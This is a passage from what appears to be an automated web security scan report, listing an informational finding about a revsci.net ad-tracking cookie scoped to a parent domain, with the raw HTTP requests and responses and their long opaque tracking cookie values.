mh35sfFSIY0UU/fiAEJ/fJNFfnJwA0WPk1ZnR1K+NOAJbX6ZI76WjdZELtv7JMdCxff4HV/u8Q3Z2Ae7qSsoPi0hmnov1/9fPW5ENa+efGTtDnA0gnNhsMxNCjKKBgpjfq1mwSYmsZ7CiqC/kHMYJfO32DvOai+JyJD5pwikGVt1zjzWk5zMvbwXw1GWp+mrTFso5RWrR8xGFNDvjUYgj6LocNL2iX/DB5TgDpPm/ISEYnCrz9ztbO32dxlZfE"; rsi_us_1000000="pUM14y+nMBYULQEQO7/+CjMlvdJdDfSHjvo8ch/k5QlLiLA6sKSBtKv830clUxoW0urep3aZ/Kqs+qiiBU9G2yGePBfJiZ7XraKyyBnmVEkLYK+9ltSt2s1xurZiR6H28SrANKfg2ZTQr4VMhhApGwl7qzRB5eGo8GXOa1cwsHj5LNpFUOgdNaxE0KDMWcpRZkC09IWKwLqpNQkuxoXYih5PJZUgmuidZVc7/uuOinzqwcuujjrSFNDRG7FArDUD7k09ajDDzzCOJXGdTKTd1dhCqdcK/DW51mcevKBrCVwfrmrF9EyApdp6g8XCjp0QJeGwcbKc+a64i3joCiPXXB8348MtsiLMQji12itA07kMWpTbOxJHOuEnYRDjJrur+/NQX8ysf9K47P25gT9az0LudIyEY9Z/0dmDs0MDGOabh2y+z/qCq/tLkSbAsPh1qm3tn5+waHrF1jWrJmS0Lb5WBeWtWcb7roDLXuJg4bJLDEun2uFVQDaj01itbl6WXy4n/R4UOW3gyhL7P4jFQHotLztydLwowndr8Ds39cz2s6lsU1+/o6PJRPGeZovOFhcxarjdrHQgs8YUJCIRRMMMjJP13Xu2JCaakMvJ6gV11ug0p0o2YHgKZOGAM0+t+Ahw9OSqG1qiOH8epcd1Y/+mVpQkvMuqF2ZYn1sQFi+RgfRX4GqTUiWwUAhrgp4mzsjtVoMIOt3Qc3skR/puiAhs3ut3mUxX1XFiawgLnrfHoLSUTJqBA0axdaaYUfEEWt6yzeS12lB/dF/R8aClBsKke+SOtUVddKniqvrHVs900YQCLT9OYzFt00dJNgaw1uus0Vq0AqNRYAjcwvg3zo8fMG2iBz4sy/OW1+6zN7vch1/H6Cds3eX+q1eRrNTYsHd4Um/Nm0vBO5Ly4FGAtXo6cxHUXJJmcTHr68PZRhb1BkVu2+YyBB/GfUECgADEUpcHeqHtcMfEGpwwjQXxru1bogLKOtfzrGrcLSacrROzrbUw+iXBU+UhRSGRsE0qxdK/cVuXTY6uupbM7QvIgbU8xzRCWC0HR0G4mmEaABfHKJVJXUA/6HK31slxFP3WXhudejLvJJdu44fKm3T5d1zOXpR1e+ljW83YkhCgNVOZkBuYS9LvElSdYp0b9r47MRHmsLKl/0Ocwxqi8ODrNbz9XnnPwdaNvrV7iAAtTFQQ3b/DTPwspPo31rZwgrNQiCwPwoBCeKS7qmqpFa41E2DzAY3vCymi5rHBzmlwcs9Uap3I8MoBSjJNbUm5qiD7Gmtk2RL+ZhLEB1EbdktfAYOx+xgvtFdiPIs65RM7YJBjjm7nWYqccIJ9DHGivCpISnoP7BwF9zsuxVm8QhdhkUrjqX/nKY/sh5XiYullw5DCNgmvw6i1jpFs2D5lRxYfgVNHjU+c/I1hoKVJRAbTKCkgsiz/hPnNLXjPCpqJlxzpRX/YD2t6dy/pNmwpRuYe2mJJNNCOhCYBkOgkgXE/v8r87yn4iyDPmrwAyBNKjNGhHNBybjl7/ACKHvbdfZpAs8Pt8o8wpjCN+nX8GTIMjMqpObF2Z6TGv4YtvtQ09fbMVVZPXse3Nnnel4ve/OZ7ZPiCGWcLUzVuzy8J6tNZkg0CrA7ruA+yoll0dhNtQ27cGbm1BB7Z4gM2O9C6zyJzCp+FIqQuqM38KmUoIPecSyIgBfoLHHUyLVnor0XG5lfSVk9+9ij6V+DDyNownTsAUJYfrpG2id1H5DgbX2xPi19xFIDOQ4pjg62D+R0v5EBMdQT6GRQxucssggWnTOsHX3TD698="; rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLAjTX17HF2gQ4O3XYcv0liDtqNncA2iFgL2JciE4z/2iaPmPX0PZEBa5THqhL8Vtypo+SEqfqKrhJdPaHwQlBIe6iD7zRzZlP3ivfC9uJamaWvpbVB03OAqYO3nwIMN4A0EWPixZ0W6zDG6mES70gBRV2cbgIsfnYVURrt1voweTUSq+JKPIGHpzqRM7I3Wj7rc4BZJq6vNXf9yaVsln1QSo5vPXT6p0mZVKjLoUUAZMDTfGUdtLDaLHFZ/if5mQpDwTQF71S0ZbH4+81ohkie50df67ygKKPwqlTXFuH2GNVRLlPwTXR5/L2uXjDq+XABH4kjxxNhO2NdZjfx1EDh8DhQX7cFCfaGYYFkRv5/uOBmvOXdHxYl9LYtCCaVvHoqZBPd1YOpz4fIYhTVpAizX/w/PY+bwcyN2qrgxmZlp5NYJVFWb86Tg/wCoRLG7vfKAzA/QqqCjc6IdWrt2+E4htplc1oKKHKkXaqqe7he1zAEIrX5zxkD+HIy/V1gctWO51L+ADs20x91UBXCmoOkk4BgR9/XbtHIzoNwoE0eq6XV8jrb6iYexF2YIWglMT+Nw+rLYOPUYbtq0aW9N5dgN9GlQ4NhU23njUr4ecF1Uzc9YEzgAFrpqwNUiVaC0HaVs60CO0=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EmhOQMMpzaxu2F29/z4eoxYqCQLAjTX17HF2gQ4O3XYcv0liDtqNncA2iFgL2JciE4z/2iaPmPX0PZEBa5THqhL8Vtypo+SEqfqKrhJdPaHwQlBIe6iD7zRzZlP3ivfC9uJamaWvpbVB03OAqYO3nwIMN4A0EWPi0I76xpm8QBpbXOY7VjkzlzOETVPxHAI3DbYZkryrWC3bnZ7rH2dGmBeaueJuJAxniY4JFGxGrGBKxNU+Z1EdU+cEVjhrWtS1s351oN25nSmUGacCmXS4lpoEKnh/FrSF71S0ZbH4+81ohkie50df67vgKKPwqlTXFuH2GNVRLlPwTXR5/L2uXjDq+XABH4kjxxNhO2NdZjfx1E7hsDhQX7cFCfaGYYFkRv5/uPBlfOXdHxYl9LYtCCaVvHoqZBPd1YOpz4fIYhTVpAizX/w/PY+bwcyN2qrgxmZlp5NYJVFWT8rTknwCoRLG7vfKAzA/QqqCje2IdWrt2+E4htplc1oKKHKkXaqqe7he1zAEIrX5zxkD+HIy/V1gctWO51L+ADs20x91UBXCmoOkk4BgR9/XbtHI9IMwoE0eq6XV8jrb6iYexF2YIWglMT+Nw+rLYOPUYbtq0aW9N5dgN9GlQ4NhU23njUr4ecF1Uzc9YEzgAFrpqwNUiVaC0HaVpq8CPI=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:10:42 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 12:10:42 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.156. http://pix04.revsci.net/I10985/b3/0/3/1008211/448263760.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/448263760.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNxqsMTbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCXboeqt1vqkp6PLPFjL00+dhAJFHV+aNKdWI3SWQJ9jzYJE3gOjtyYh9xLa/AMaH+zcOLos3pOtUoEJjiTdZfoh1MpDxoStFft4n9eONVnIExtLnEqN2My6sEyz2PxOrG9l6BdQSqHmABYkgWFWP7jxFSXUbK7RUBg3eTztOcdcVqcR3bYljEZKiH6egiDWmDppUlMfb4NNC4Llh7XBXsHRzLc8AuMKqxVe1ga4iTMfrUSwbvbl4vGJ24IbloKzsVauNIQgj3ASjfhfLysLDkP3d2+aCTk4AAqhC4JqDP2n329QAMTIk+8XFDsgf1aRQmegVej8rRrlIHrQ0mj3h9SxI5Dg3jlaU1fE3sJz+2RW+lX8QOeIgg4JxBXc3cQ2j06OXaUltH/yzGGHO2k5BBw4eWUvGo8eEvNJjYvWVvSYoM0WDuJKGnvPoziw8U3afVem+870C8ER2yK1Ixze2; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:13:45 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/448263760.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_DHsK="MLsXtSMNJjhvJZE469KkOkhRwa7hUMAPxrf6hJozRd8Z+A+35M/kolpihGJj4llhxoQ3e3VA0m2LzBczWmMLddhk5yhzvkzg8jzc0DvGDoKVMLvuTFv9DuubBt/bmQjpkEkL0yVoSRMqdmIKsKUJBBt5fjnlpRQK7VdU15yYnxcJzby/kvbEkvIZ79o1x4Z3q1g4Vw63jaBdJpmSBC3le5osalTB1PUkXBt960tt2w6V1scEo9kOQKOUX3rmMod464MbYua39RJ3UL4xOIDLswBI6sRjJkqBSmj/SZnrJ9d7BwGkbALtMUU1dWmpE8b3M+GoJF8JGbBXRoRJVpJUH3L2zAnQvhmUDY0Oo88WQfE7LcsfcJmHJmBWqsgTtYjvp2DUld9dcr3u3izXuDWrziSDDHLdu3ylyaLBRubmvDR1iZj1Qbn2z1hf3PHdR4uKHaqAH6rkLEi0xHlIsJwsWEVI6NPXZKfM8YAvfz0ZPXSLcmwJsce5HyZaDT53FFsiRTFNxaXPb++jWAGYkSyjLL4sZO6UtzgxhDFq4Ce0fmpMS2DlXsVROQdL1LnmC5i3WIPO8dRiKk1bnsnlkN8n1IIEch0Pfz4V0AQdjrKVxSs9GjZjX8UMjX6iADJoSDCY1dnMeJlhKG24oy7G7maDeGyb09dgzGHHrtR6FKImScgiSZ7XPefDWZoUAIKA2LNdXRrPUJQ4FzVlPlwbf39aVyOagK4stPcOUDCMKsi7uuot//bg9uHMnMy4r2Yh1JofnMSZDqHmlxmalID0eiYLv/iMsT4AxbYatbkp4WIVBO8n6Vbd/NeylZjpjpirE/4ecJ+AmsS++eqmRTQXHmiTHgTT2MVZAvRmCmJcaTTkeWPrs0t2+tO7yUE8ItZMrdEBm8MfMHsJIuQ0iLw0ocrx3BTR5/FIM0XcQ0bd0vcKcfacC+7vT1lbuHt+8FTPdwcWffWlyGQlMp45iDzw92J/PV2Du+Alh2I5rWbOYBZnXwABimMvqUUCz86wzJqb0f+yiNsuyAwYK6nX9N9kuDIJd9wIYca95kZ1Z/SGBUoqiXgc1n3BFfSTiVt4LwS3IoUQI0c+DxBrqast5e6zQN8VB0ULEAeLj4rJGIPw0zguqx43Bhh0MPAndnLEsDxxwj7lc8t3RwonYzuvzOI+NKF5M643xcZW7Wfu3m1j8sqGtT6w41cWttMMuL2yAEzvELYx5LfRJ98QUj0XsaRXvPO7VX6E4Cp2rBR2wvQysFG0lVpzgWacoFU7ttqI0vyb8pg+MdBF8eeSpeRRMSQEfHnxUtjEq8Gl8ynmMKm04omwknt+Yy/3E2qv9hQ6MfClNIPOsPPuh8uZg5/VX1Oe31vRopeZ"; rsi_us_1000000="pUM14ymnMBYY7dXKYa7+iv3EgSSw/Y8tJ+gZNnYLLHa8d4Y1v0lUZEkxjU7NelY0QcHuDIfwANFyTJhbu1sDnNJWUfcNgGQxkM69Bg6zQefWQthJGqP3aEP/Els3EHmRToETTZFmihDhiVKOCXLxkiM17TU7zj4ngiQ4oRnPnFK89XPRmRV4IWSdXROcDuxjITdkLEY03nS13tB3wtTOwQKZEgSeSALCIxbusJEfXL9zmpsCYE22t4xzi4o9NKvXRAGU8PiJjcr/rHOJeDVjh+8Nwr6ukBIEminfuK3P1X4TSXwz4MKEEm7SUVd6CUcoDnUzXeAi/Ct/TuruCiMtaygwY0AtigC9uSei/+HoKkWB4Aowhx48DKSIqsQsg0UYDjaqK95XiKBS91uetAb3fI46x9yMJ3r2oekFVZ6ASf282CVOAOSDpU+O3dhOmqH9HP7OlPyI6xpl0c0TJMT5pGN2v3qnTggdFXvmkjFzPQDqXZNW238/T3D4KuRGTu9pkIwnpOpJqqDL8ZlTqm1tx4nqVc24up7SInWtNx7NFc7BxYxVco7FMzrF92J6UpgIp+yIztei9sPUzKynkQ9sWomHNvCzgP6ccGH8UvNnL5S58r+C3uBIymBfMwCvaXNTp18jRw9bdzEAOKb/rvhJU2MzufW18Ip11vrWfY/TG4Sp9FjObKnLCuB+4RbNM07gH6sAorjAwk2VCaMxDYuK+Z6En1QLphpu4gVZF2sjYw/FLOFmI94MAMrke79ISvFyZGbyjNp9essYi+wchn4V07oHr4dabBjwFR23PZeiphiesFNb+cyoVNdyhlP9w/XvrRQbPBAWDY0BdGhwUIerxQ+uerOSSqwscxIVtB+Mwv0jFEprhvzuE0kVIS28+gd2bm+WSGHVOCMciv9JataWaBZQGfs6pUvPzds1P7KLxu4wHCX2z8bRZB7Gyjxy5Ia+BODCRc7SrZGeKnnpYfoIxNaRDKG7ninMFwF5gUNLyPVADN9lLUNfpYq+gra8ruVatoC9afDD+iMhSFd9G5D6am9KIP5qY5BtyqvGL7PgN9EQlf5YS5uFdp6OAWsS85f4uJA/1M18GXGH6VooGiXZ3BB53qQLC2jhFERFULUGK8hBP05FF0IDAydZY98TP6jb0nMor7K/orqkaMul59jgfaN8a2IGG4t+R8znelSB+bITeTFPB4/gTcZcMN+UMu8jqWHhULTTTbPcaBlbE2KvXKE6ku8NIu7AKwy7jV9pXlHoawd0H4MbxqbO9vZYnLlf62hk2RJzDSxIrB/Rn4RuyP0XxnTk+50FTr1kui3jEbyG99/f12p572qbwJyun7m6BhaM/n58xh77SYrFpZRWWawm2e6p+xcItwf0282IV+Fw3jSKra7kb4NpMIusVevkyB6djSc0LM+8k1F0XKu3Vdvht6L/iOqs19nue3Z7xLH8NuacTm9qxpjMhx/Q7zD9eCbQy4Lo2ZtueYSKTE7VS36vSfGiQRYAbOnZoiYCjNGhHNgS7jl7/ACKHvbdfZpAs8Pt8o8wpjCN+nX8GTIMjMqpObF2Z6TGv4bNRxd8GeEQfxaZwvg3Ny5iJT+tzBf6taQvSuL20MSLoOKwtq5w71FxjQ4PfS3ac66VNHDjRz1SJlaoX1obksm73hVeD/zKt49OBtJAd/HzQ93O2ck4qrqD8IaBLh4rpnQOFzl53yTbKkZjvRPLfkTqekmk0FO63N/958vGrs7cjCxS0xln3boMB2H7+OFOKJgheBCIQ4QyzN2mjB4Gni5rdsSitq7H83ERSQ=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47hsEu65JwcIlocE02QQ4O3XYyvheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXT/TAhJnU0cgpqwwScHEsq8jKcVWn8biBJeiwj3bt/Z7Jno4eTUvRzGf2u88Dt+Xr5SMrCaDesP2v1b0OTJJ0SaxGkI/wp7+XJEJqbjRJx9w5bfXe8nwj2VXUacosCwLh4HW1pafBXtBaZ69LF3vwwNiRMOzM2hOzmIl3bkaNEsVIksCLP5999EuHzKn85b+RXLBsjSFFV0agoS/Jfx4k7aGNVLKrwEhGKUEzhi8su0/uHnOe/MI8K1GBTn0ylHtMW0WP7jj9NMmEJxcYL14KP5bRvdcEqMtnr5FuUm+ZX8oLSOVRIUq7/BtjCYFwht3qbVc3urxzt+WV0MjZotbYCyIyN9fyoSwKTalgv0KxRPYFCwCjSu43HOkv6/0ZnJF5d4moBJxG/sBRtzsX8Qa3Gsr4OpPCzXFOprPkayut7xAZ1bxQGTfJzykrpLTZH6Rm+7k/b/hVyQhkuGz19/co4YMGL4ewrib0GrKI2iHUlKHo51qJ+p39UCrWLj0R0c2CekkBti3JIaaJwZMa1PEeur98RNTZXxd8CxrA9JYkSt7Dm7N66rF7GLRUdq9LIeG1plVoDA==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOHMQT7uItGF29vyo/tk8g7ZPQu/ETCAB2QQ4O3XYiv0liHtqFncA2iMgL2Is5g9oNxqsMTbiADbei4xleib6fOTfjH1a2wyQnsvM/9rrSc8osckkFeddzYOSGbneI5567GeW6vbjOwWQEAWvERBw6TjPQ4L4Uubg0NaY9wI2KrzCfuCquS5+ymtq0blYCXboeqt1vqkp6PLPFjL00+dhAJFHV+aNKdWI3SWQJ9jzYJE3gOjtyYh9xLa/AMaH+zcOLos3pOtUoEJjiTdZfoh1MpDxoStFft4n9eONVnIExtLnEqN2My6sEyz2PxOrG9l6BdQSqHmABYkgWFWP7jxFSXUbK7RUBg3eTztOcdcVqcR3bYljEZKiH6egiDWmDppUlMfb4NNC4Llh7XBXsHRzLc8AuMKqxVe1ga4iTMfrUSwbvbl4vGJ24IbloKzsVauNIQgj3ASjfhfLysLDkP3d2+aCTk4AAqhC4JqDP2n329QAMTIk+8XFDsgf1aRQmegVej8rRrlIHrQ0mj3h9SxI5Dg3jlaU1fE3sJz+2RW+lX8QOeIgg4JxBXc3cQ2j06OXaUltH/yzGGHO2k5BBw4eWUvGo8eEvNJjYvWVvSYoM0WDuJKGnvPoziw8U3afVem+870C8ER2yK1Ixze2; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:13:45 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
